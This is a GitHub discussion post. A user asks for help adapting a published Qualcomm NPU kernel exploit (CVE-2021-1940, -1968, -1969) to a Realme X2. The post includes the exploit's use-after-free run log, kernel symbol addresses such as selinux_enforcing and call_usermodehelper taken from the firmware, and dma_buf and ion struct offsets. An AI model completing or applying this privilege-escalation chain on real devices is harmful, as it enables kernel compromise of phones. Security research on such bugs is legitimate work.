Exploit for Qualcomm NPU bugs (CVE-2021-1940, CVE-2021-1968, CVE-2021-1969) #806
Unanswered
bitbounty85
asked this question in
Q&A
Replies: 1 comment
-
|
402 |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
Uh oh!
There was an error while loading. Please reload this page.
-
I am trying the npu exploit "https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Qualcomm/NPU" on realmeX2 device, the device specifications is given below.
Device Specifications:
Model: RMX1992
Processor: Qualcomm SDM730G AIE Octa-core
Storage: 4Gb ram, 64 Gb internal storage
Android_version: 10
Android_security_patch_level: 5 May 2021
kernel_version: 4.14.117
build_no: RMX1992EX_11_C.18
firmware: RMX1992EX_11_OTA_1180_all_4MQxOL7lVVxp.ozip
The phone is rebooting, the log is given below.
[+] host_irq_wq offset: ffffffc3ee54d418
RMX1992L1:/data/local/tmp $ [+] network_stats_buf (controlled data) address: 0xffffffc38f9e4000
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 4 reallocation threads ready!
[+] trigger uaf
[+] reallocation data initialized!
[ ] initializing reallocation threads, please wait...
[+] 8 reallocation threads ready!
<phone_reboots_here>
I extracted the kernel.elf from firmware and found the addresses
and substracted 0x80000 to get the below offsets.
#define BPF_PROG_RUN32 0xFFFFFF8008146068
#define INIT_TASK 0xFFFFFF8009D9CC00
#define HOST_IRQ_WQ 0xFFFFFF80089F9DF8
#define ION_DMA_BUF_VUNMAP 0xFFFFFF8008BDF5D0
#define BPF_CALL_BASE 0xFFFFFF8008144770
#define SELINUX_ENFORCING 0xFFFFFF800A4A1000
#define DO_TASK_DEAD 0xFFFFFF800806D580
#define MEMSET 0xFFFFFF80090A7200
#define MEMCMP 0xFFFFFF80090A6D04
#define ARGV_SPLIT 0xFFFFFF80090A78E8
#define CALL_USERMODEHELPER 0xFFFFFF8008050280
#define RUN_CMD_ENVP 0xFFFFFF8009DAE370
#define ION_ALLOC_FD 0xFFFFFF8008BDDDB0
//offsets to dma_buf and ion_buffer
#define PRIV_OFF 168
#define HEAP_OFF 32
#define OPS_OFF 56
#define MAP_OFF 16
#define UNMAP_OFF 24
#define CNT_OFF 136
from vmlinux i got the above offsets and the structures from
which i got these offsets are mentioned below.
struct dma_buf{
...
void* priv; //PRIV_OFF
...
}
struct ion_buffer{
...
struct ion_heap* heap; //HEAP_oFF
...
int kmap_cnt; //CNT_OFF
...
}
struct ion_heap{
...
struct ion_heap_ops* ops; //OPS_OFF
...
}
struct ion_heap_ops{
...
void* (*map_kernel)(struct ion_heap *, struct ion_buffer *); //MAP_OFF
void (*unmap_kernel)(struct ion_heap *, struct ion_buffer *); //UNMAP_OFF
...
}
can u please help me @m-y-myo
Beta Was this translation helpful? Give feedback.
All reactions